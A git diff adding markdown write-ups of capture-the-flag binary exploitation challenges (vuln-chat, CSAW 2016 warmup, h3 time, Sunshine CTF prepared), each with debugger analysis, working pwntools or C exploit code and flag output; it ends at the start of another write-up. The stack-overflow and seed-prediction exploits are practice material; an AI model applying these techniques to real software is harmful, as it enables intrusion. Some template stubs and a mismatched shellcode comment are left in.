+ 0xffffd0bb: 0x36373839 0x32333435 0xffd10031 0xffd19cff
+ 0xffffd0cb: 0xdd8c99ff 0x34333231 0x38373635 0x04860039
+ 0xffffd0db: 0x00000008 0x00000100 0x73303325 0x00000000
+ 0xffffd0eb: 0xdbfa0d00 0x000001f7
+
+ gef➤ i f
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x8048639 in main; saved eip = 0xf7dbfa0d
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
+ ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+
+Here we see that the return address is at **0xffffd0ec** so we calculate the offset between our second input **0xffffd0bb** and the return address:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0ec - 0xffffd0bb)
+ '0x31'
+
+
+
+So there is exactly 31 bytes between the second input and the return address, so this is a hint that the default 30 bytes of second input will not be able to reach it, that's why the first input is there to reach the %30s value beforehand to change it. From here we can make the following exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process ('./vuln-chat')
+
+ #print the initial text
+ print(target.recvuntil("username: "))
+
+
+ #form the first payload to overwrite the %30s value
+ payload0 = b""
+ payload0 += b"\x00" * 0x14 #fill up the space with 0x14 nullbytes until the %30s format string value
+ payload0 += b"%99s" #overwrite %30s with %99s
+
+ #send the first payload through the first scanf
+ #print(payload0)
+ target.sendline(payload0)
+
+ # Print the text up to the second scanf call
+ print(target.recvuntil("I know I can trust you?"))
+
+
+ #write the second payload to overwrite the return address with the print_flag function address
+ payload1 = b""
+ payload1 += b"\x00" * 0x31 #fill up the space until the return address with (0x31 nullbytes)
+ payload1 += p32(0x804856b) #write the address of print_flag in little endian 32 bits
+
+ #send the second payload through the second scanf
+ #print(payload1)
+ target.sendline(payload1)
+
+ #drop into an interactive shell to view the rest of the output
+ target.interactive()
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/55 ] [binexp/2/vulnchat]
+ → python3 exploit.py
+ [+] Starting local process './vuln-chat': pid 2786552
+ b'----------- Welcome to vuln-chat -------------\nEnter your username: '
+ b"Welcome !\nConnecting to 'djinn'\n--- 'djinn' has joined your chat ---\ndjinn: I have the information. But how do I know I can trust you?"
+ [*] Switching to interactive mode
+
+ : djinn: Sorry. That's not good enough
+ flag{g0ttem_b0yz}
+ Use it wisely
+ [*] Got EOF while reading in interactive
+ $
+
+
+And our exploit worked! We have been able to print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/warm.md b/2/warm.md
new file mode 100644
index 0000000..9d85b53
--- /dev/null
+++ b/2/warm.md
@@ -0,0 +1,320 @@
+# CSAW 2016 Warmup
+
+## Downloading the binary file:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ --2021-02-27 11:02:37-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw16_warmup/warmup [following]
+ --2021-02-27 11:02:38-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8705 (8.5K) [application/octet-stream]
+ Saving to: ‘warmup’
+
+ warmup 100%[=======================================================================================================================================================================================================>] 8.50K --.-KB/s in 0.001s
+
+ 2021-02-27 11:02:38 (7.11 MB/s) - ‘warmup’ saved [8705/8705]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → file warmup
+ warmup: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ab209f3b8a3c2902e1a2ecd5bb06e258b45605a4, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → chmod +x warmup
+
+
+` ![]()
+
+## Solution
+
+first of all let's see what we get when we run the binary file:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → ./warmup
+ -Warm Up-
+ WOW:0x40060d
+ >something
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → ./warmup
+ -Warm Up-
+ WOW:0x40060d
+ >something2
+
+
+
+First there is some text getting displayed, we get an address '0x40060d', then we get prompted for text input and nothing after that. So let's check what the binary file looks like in ghidra:
+
+
+
+
+ void main(void)
+
+ {
+ char local_88 [64];
+ char local_48 [64];
+
+ write(1,"-Warm Up-\n",10);
+ write(1,&DAT;_0040074c,4);
+ sprintf(local_88,"%p\n",easy);
+ write(1,local_88,9);
+ write(1,&DAT;_00400755,1);
+ gets(local_48);
+ return;
+ }
+
+
+
+Here we see the main function disassembled code, which is rather simplistic, we also see that our input text gets put into the local_48 variable at -0x48 on the stack:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x48]:1 local_48 XREF[1]: 00400692(*)
+ undefined1 Stack[-0x88]:1 local_88 XREF[2]: 0040064d(*),
+ 00400668(*)
+ main XREF[5]: Entry Point(*),
+ _start:0040053d(*),
+ _start:0040053d(*), 0040077c,
+ 00400830(*)
+ 0040061d 55 PUSH RBP
+
+
+
+However most importantly, we see that the address being printed is the address of the function called 'easy' at 0x40060d
+
+
+
+this function is supposed to print the contents of flag.txt for us. Now before that, in the main function we see that our local_48 input text variable gets passed through a 'gets' function, this is a bug because it does not limit how much data it scans in. We also see the following:
+
+
+
+ void main(void)
+
+ {
+ char local_88 [64];
+ char local_48 [64];
+
+
+
+our local input variable (local_48) can only hold 64 bytes of data, after we write those 64 bytes of data, we overflow the buffer and start overwriting other things in memory. With this bug we can reach the return address (the address after the ret call) and with this we want to make use of the 'easy function to print us the flag. so let's use gdb to see how much data we need to send BEFORE overwriting the return address:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → gdb warmup
+
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from warmup...
+ (No debugging symbols found in warmup)
+ gef➤
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x000000000040061d <+0>: push rbp
+ 0x000000000040061e <+1>: mov rbp,rsp
+ 0x0000000000400621 <+4>: add rsp,0xffffffffffffff80
+ 0x0000000000400625 <+8>: mov edx,0xa
+ 0x000000000040062a <+13>: mov esi,0x400741
+ 0x000000000040062f <+18>: mov edi,0x1
+ 0x0000000000400634 <+23>: call 0x4004c0
+ 0x0000000000400639 <+28>: mov edx,0x4
+ 0x000000000040063e <+33>: mov esi,0x40074c
+ 0x0000000000400643 <+38>: mov edi,0x1
+ 0x0000000000400648 <+43>: call 0x4004c0
+ 0x000000000040064d <+48>: lea rax,[rbp-0x80]
+ 0x0000000000400651 <+52>: mov edx,0x40060d
+ 0x0000000000400656 <+57>: mov esi,0x400751
+ 0x000000000040065b <+62>: mov rdi,rax
+ 0x000000000040065e <+65>: mov eax,0x0
+ 0x0000000000400663 <+70>: call 0x400510
+ 0x0000000000400668 <+75>: lea rax,[rbp-0x80]
+ 0x000000000040066c <+79>: mov edx,0x9
+ 0x0000000000400671 <+84>: mov rsi,rax
+ 0x0000000000400674 <+87>: mov edi,0x1
+ 0x0000000000400679 <+92>: call 0x4004c0
+ 0x000000000040067e <+97>: mov edx,0x1
+ 0x0000000000400683 <+102>: mov esi,0x400755
+ 0x0000000000400688 <+107>: mov edi,0x1
+ 0x000000000040068d <+112>: call 0x4004c0
+ 0x0000000000400692 <+117>: lea rax,[rbp-0x40]
+ 0x0000000000400696 <+121>: mov rdi,rax
+ 0x0000000000400699 <+124>: mov eax,0x0
+ 0x000000000040069e <+129>: call 0x400500
+ 0x00000000004006a3 <+134>: leave
+ 0x00000000004006a4 <+135>: ret
+ gef➤ b *main +134
+ Breakpoint 1 at 0x4006a3
+
+
+here we want the first breakpoint right before the return call at +134, then we run the binary:
+
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/warmup/warmup
+ -Warm Up-
+ WOW:0x40060d
+ >13371337
+
+ Breakpoint 1, 0x00000000004006a3 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffe0b0 → "13371337"
+ $rbx : 0x0
+ $rcx : 0x00007ffff7fac980 → 0x00000000fbad2288
+ $rdx : 0x0
+ $rsp : 0x00007fffffffe070 → "0x40060d\n"
+ $rbp : 0x00007fffffffe0f0 → 0x00000000004006b0 → <__libc_csu_init+0> push r15
+ $rsi : 0x31373333
+ $rdi : 0x00007ffff7faf680 → 0x0000000000000000
+ $rip : 0x00000000004006a3 → leave
+ $r8 : 0x00007fffffffe0b0 → "13371337"
+ $r9 : 0x0
+ $r10 : 0x6e
+ $r11 : 0x246
+ $r12 : 0x0000000000400520 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe070│+0x0000: "0x40060d\n" ← $rsp
+ 0x00007fffffffe078│+0x0008: 0x000000000000000a
+ 0x00007fffffffe080│+0x0010: 0x0000000000000000
+ 0x00007fffffffe088│+0x0018: 0x0000000000000000
+ 0x00007fffffffe090│+0x0020: 0x0000000000000000
+ 0x00007fffffffe098│+0x0028: 0x0000000000000000
+ 0x00007fffffffe0a0│+0x0030: 0x0000000000000000
+ 0x00007fffffffe0a8│+0x0038: 0x00000000000000c2
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400694 rex.RB ror BYTE PTR [r8-0x77], 0xc7
+ 0x400699 mov eax, 0x0
+ 0x40069e call 0x400500
+ → 0x4006a3 leave
+ 0x4006a4 ret
+ 0x4006a5 nop WORD PTR cs:[rax+rax*1+0x0]
+ 0x4006af nop
+ 0x4006b0 <__libc_csu_init+0> push r15
+ 0x4006b2 <__libc_csu_init+2> mov r15d, edi
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "warmup", stopped 0x4006a3 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a3 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+We gave it a simple pattern '13371337' so now we search for that pattern:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x602000-0x623000), permission=rw-
+ 0x6022a0 - 0x6022aa → "13371337\n"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ **0x7fffffffe0b0** - 0x7fffffffe0b8 → "13371337"
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffe100:
+ rip = 0x4006a3 in main; saved rip = 0x7ffff7e14d0a
+ Arglist at 0x7fffffffe0f0, args:
+ Locals at 0x7fffffffe0f0, Previous frame's sp is 0x7fffffffe100
+ Saved registers:
+ rbp at 0x7fffffffe0f0, rip at **0x7fffffffe0f8**
+
+
+
+Now let's calculate the offset:
+
+
+ >>> hex(0x7fffffffe0f8 - 0x7fffffffe0b0)
+ '0x48'
+
+
+So now we know that after 0x48 bytes of input, we start overwriting the return address, so we can write the following exploit:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./warmup')
+
+ # Make the payload
+ payload = b""
+ payload += b"0"*0x48 # Overflow the buffer up to the return address
+ payload += p64(0x40060d) # Overwrite the return address with the address of the `easy` function
+
+ # Send the payload
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+Then run it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [binexp/2/warmup]
+ → python3 exploit.py
+ [+] Starting local process './warmup': pid 78458
+ [*] Switching to interactive mode
+ -Warm Up-
+ WOW:0x40060d
+ >flag{g0ttem_b0yz}
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './warmup' stopped with exit code -11 (SIGSEGV) (pid 78458)
+ [*] Got EOF while sending in interactive
+
+
+and we got the flag !
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/3/0.md b/3/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/3/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/3/0.png b/3/0.png
new file mode 100644
index 0000000..e6e8bc3
Binary files /dev/null and b/3/0.png differ
diff --git a/3/1.png b/3/1.png
new file mode 100644
index 0000000..82cf4d1
Binary files /dev/null and b/3/1.png differ
diff --git a/3/2.png b/3/2.png
new file mode 100644
index 0000000..26b5ab3
Binary files /dev/null and b/3/2.png differ
diff --git a/3/h3.md b/3/h3.md
new file mode 100644
index 0000000..2991301
--- /dev/null
+++ b/3/h3.md
@@ -0,0 +1,219 @@
+# h3 time
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/h3_time/time
+ --2021-03-07 12:51:05-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/h3_time/time
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/h3_time/time [following]
+ --2021-03-07 12:51:05-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/h3_time/time
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8864 (8.7K) [application/octet-stream]
+ Saving to: ‘time’
+
+ time 100%[================================================================>] 8.66K --.-KB/s in 0.006s
+
+ 2021-03-07 12:51:06 (1.41 MB/s) - ‘time’ saved [8864/8864]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → file time
+ time: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4972fe3e2914c74bc97f0623f0c4643c40300dab, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → chmod +x time
+
+
+
+` ![]()
+
+## Solution
+
+First let's take a look at the binary with pwn checksec as well as running it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → pwn checksec time; ./time
+ [*] '/home/nothing/binexp/3/time/time'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: 1234
+ Your guess was 1234.
+ Looking for 34981616.
+ Sorry. Try again, wrong guess!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./time
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: 4321
+ Your guess was 4321.
+ Looking for 994945792.
+ Sorry. Try again, wrong guess!
+
+
+
+
+So here we see that we have a 64bit binary. When we run it, it prompts us to guess a number. Let's check what ghidra finds on that binary:
+
+
+ undefined8 main(void)
+
+ {
+ time_t tVar1;
+ long in_FS_OFFSET;
+ uint local_18;
+ uint local_14;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ tVar1 = time((time_t *)0x0);
+ srand((uint)tVar1);
+ local_14 = rand();
+ puts("Welcome to the number guessing game!");
+ puts("I\'m thinking of a number. Can you guess it?");
+ puts("Guess right and you get a flag!");
+ printf("Enter your number: ");
+ fflush(stdout);
+ __isoc99_scanf(&DAT;_00400bbc,&local;_18);
+ printf("Your guess was %u.\n",(ulong)local_18);
+ printf("Looking for %u.\n",(ulong)local_14);
+ fflush(stdout);
+ if (local_14 == local_18) {
+ puts("You won. Guess was right! Here\'s your flag:");
+ giveFlag();
+ }
+ else {
+ puts("Sorry. Try again, wrong guess!");
+ }
+ fflush(stdout);
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+
+Here we see something interesting, first of all the **rand** function which should give a random number, as well as the scanf call with the %u format string stored in local_18. Basically the main function creates a random number, then prompts us for some number to store into local_18, and then it checks if the 2 numbers are the same. If they are we enter the giveFlag function:
+
+
+ void giveFlag(void)
+
+ {
+ FILE *__stream;
+ long in_FS_OFFSET;
+ char local_118 [264];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ memset(local_118,0,0x100);
+ __stream = fopen("/home/h3/flag.txt","r");
+ if (__stream == (FILE *)0x0) {
+ puts("Flag file not found! Contact an H3 admin for assistance.");
+ }
+ else {
+ fgets(local_118,0x100,__stream);
+ fclose(__stream);
+ puts(local_118);
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return;
+ }
+
+
+
+Here we see that this function reads and prints out the flag file from **/home/h3/flag.txt** What we need to figure out is what the output of the **rand** function will be. Thing is, the output of the ran dunction is not actually random. The output is based off a value called a 'seed' which it uses to determine what number sequence to generate. SO if we can get the same seed, we can get **rand** to generate the same sequence of numbers. Looking at the decompiled code, we see the following:
+
+
+ tVar1 = time((time_t *)0x0);
+ srand((uint)tVar1);
+
+
+
+Here we see tVar1 gets the current time as a seed, therefore we can write a C program that uses the current time as a seed, and output a digit and redirect the output to the target:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → vim exploit.c
+
+
+
+
+ #include<****stdio.h>
+ #include <****time.h>
+ #include <****stdlib.h>
+ #include <****stdint.h>
+ #include <****string.h>
+
+ int main()
+ {
+ uint32_t rand_num;
+ srand(time(0)); //seed with current time
+ rand_num = rand();
+ uint32_t ans;
+ printf("%d\n", rand_num);
+ }
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit
+ 1779237112
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit
+ 1476399991
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit | ./time
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: Your guess was 1333337650.
+ Looking for 1333337650.
+ You won. Guess was right! Here's your flag:
+ ${g0tt3m_boyz}
+
+
+
+And that's it ! We managed to print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/3/prep.md b/3/prep.md
new file mode 100644
index 0000000..17edb98
--- /dev/null
+++ b/3/prep.md
@@ -0,0 +1,301 @@
+# Sunshine CTF 2017 Prepared
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ --2021-03-07 13:57:41-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/sunshinectf17_prepared/prepared [following]
+ --2021-03-07 13:57:41-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 12888 (13K) [application/octet-stream]
+ Saving to: ‘prepared’
+
+ prepared 100%[================================================================>] 12.59K --.-KB/s in 0.001s
+
+ 2021-03-07 13:57:42 (16.2 MB/s) - ‘prepared’ saved [12888/12888]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → file prepared
+ prepared: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9cd9483ed0e7707d3addd2de44da60d2575652fb, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → chmod +x prepared
+
+
+
+` ![]()
+
+## Solution
+
+So let's first run pwn checksec on the binary before executing it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → pwn checksec prepared
+ [*] '/home/nothing/binexp/3/prep/prepared'
+ Arch: amd64-64-little
+ RELRO: Full RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 123
+ Well that didn't take long.
+ You should have used 63.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 63
+ Well that didn't take long.
+ You should have used 67.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 67
+ Well that didn't take long.
+ You should have used 24.
+
+
+
+Here we see that this is a 64 bit binary with everything enabled (full relro, canary, nx and pie). It prompts us for input to make us guess a random number, let's take a look at it in ghidra:
+
+
+
+And here we get the following code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ int iVar1;
+ time_t tVar2;
+ FILE *__stream;
+ char *pcVar3;
+ long in_FS_OFFSET;
+ uint local_464;
+ char local_448 [64];
+ char local_408 [512];
+ char local_208 [504];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ tVar2 = time((time_t *)0x0);
+ srand((uint)tVar2);
+ local_464 = 0;
+ while ((int)local_464 < 0x32) {
+ iVar1 = rand();
+ printf("%d days without an incident.\n",(ulong)local_464);
+ sprintf(local_208,"%d",(ulong)(uint)(iVar1 % 100));
+ __isoc99_scanf(" %10s",local_408);
+ strtok(local_408,"\n");
+ iVar1 = strcmp(local_208,local_408);
+ if (iVar1 != 0) {
+ puts("Well that didn\'t take long.");
+ printf("You should have used %s.\n",local_208);
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ local_464 = local_464 + 1;
+ }
+ puts("How very unpredictable. Level Cleared");
+ __stream = fopen("flag.txt","r");
+ while( true ) {
+ pcVar3 = fgets(local_448,0x32,__stream);
+ if (pcVar3 == (char *)0x0) break;
+ printf("%s",local_448);
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+Just like in the previous 2 challenges, time is declared as a seed with the srand function, and then it uses **rand** to generate values that are modded by 100 (value%100), and we have to guess it in a loop 50 times, So in order to guess the rand number 50 times in a row, this is based off of the seed, and since the seed is simply the current time, we can write a simple C program to get the seed and generate the numbers it expects:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → vim exploit.c
+
+
+
+
+ ****#include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****time.h>
+ #include <****string.h>
+
+ int main(void)
+ {
+ int i, out;
+ time_t var0 = time(NULL);
+ srand(var0);
+
+ for (i = 0; i < 50; i++)
+ {
+ out = rand() % 100;
+ printf("%d\n", out);
+ }
+
+ return 0;
+ }
+
+
+
+Here we compile it with gcc:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./exploit
+ 83
+ 93
+ 92
+ 55
+ 70
+ 63
+ 4
+ 64
+ 54
+ 21
+ 87
+ 42
+ 77
+ 17
+ 74
+ 86
+ 57
+ 18
+ 72
+ 7
+ 52
+ 76
+ 46
+ 78
+ 81
+ 83
+ 19
+ 55
+ 20
+ 14
+ 21
+ 55
+ 59
+ 13
+ 10
+ 81
+ 76
+ 67
+ 46
+ 83
+ 88
+ 33
+ 77
+ 17
+ 2
+ 3
+ 4
+ 59
+ 21
+ 28
+
+
+
+Now let's pipe it into the stdin of our binary:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./exploit | ./prepared
+ 0 days without an incident.
+ 1 days without an incident.
+ 2 days without an incident.
+ 3 days without an incident.
+ 4 days without an incident.
+ 5 days without an incident.
+ 6 days without an incident.
+ 7 days without an incident.
+ 8 days without an incident.
+ 9 days without an incident.
+ 10 days without an incident.
+ 11 days without an incident.
+ 12 days without an incident.
+ 13 days without an incident.
+ 14 days without an incident.
+ 15 days without an incident.
+ 16 days without an incident.
+ 17 days without an incident.
+ 18 days without an incident.
+ 19 days without an incident.
+ 20 days without an incident.
+ 21 days without an incident.
+ 22 days without an incident.
+ 23 days without an incident.
+ 24 days without an incident.
+ 25 days without an incident.
+ 26 days without an incident.
+ 27 days without an incident.
+ 28 days without an incident.
+ 29 days without an incident.
+ 30 days without an incident.
+ 31 days without an incident.
+ 32 days without an incident.
+ 33 days without an incident.
+ 34 days without an incident.
+ 35 days without an incident.
+ 36 days without an incident.
+ 37 days without an incident.
+ 38 days without an incident.
+ 39 days without an incident.
+ 40 days without an incident.
+ 41 days without an incident.
+ 42 days without an incident.
+ 43 days without an incident.
+ 44 days without an incident.
+ 45 days without an incident.
+ 46 days without an incident.
+ 47 days without an incident.
+ 48 days without an incident.
+ 49 days without an incident.
+ How very unpredictable. Level Cleared
+ [1] 2904178 done ./exploit |
+ 2904179 segmentation fault (core dumped) ./prepared
+
+
+
+And that's it! we have been able to guess the random number 50 times.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/3/tux.md b/3/tux.md
new file mode 100644
index 0000000..4720599
--- /dev/null
+++ b/3/tux.md
@@ -0,0 +1,278 @@
+# hsctf 2019 tux talk show
+
+## Downloading the binary file
+
+
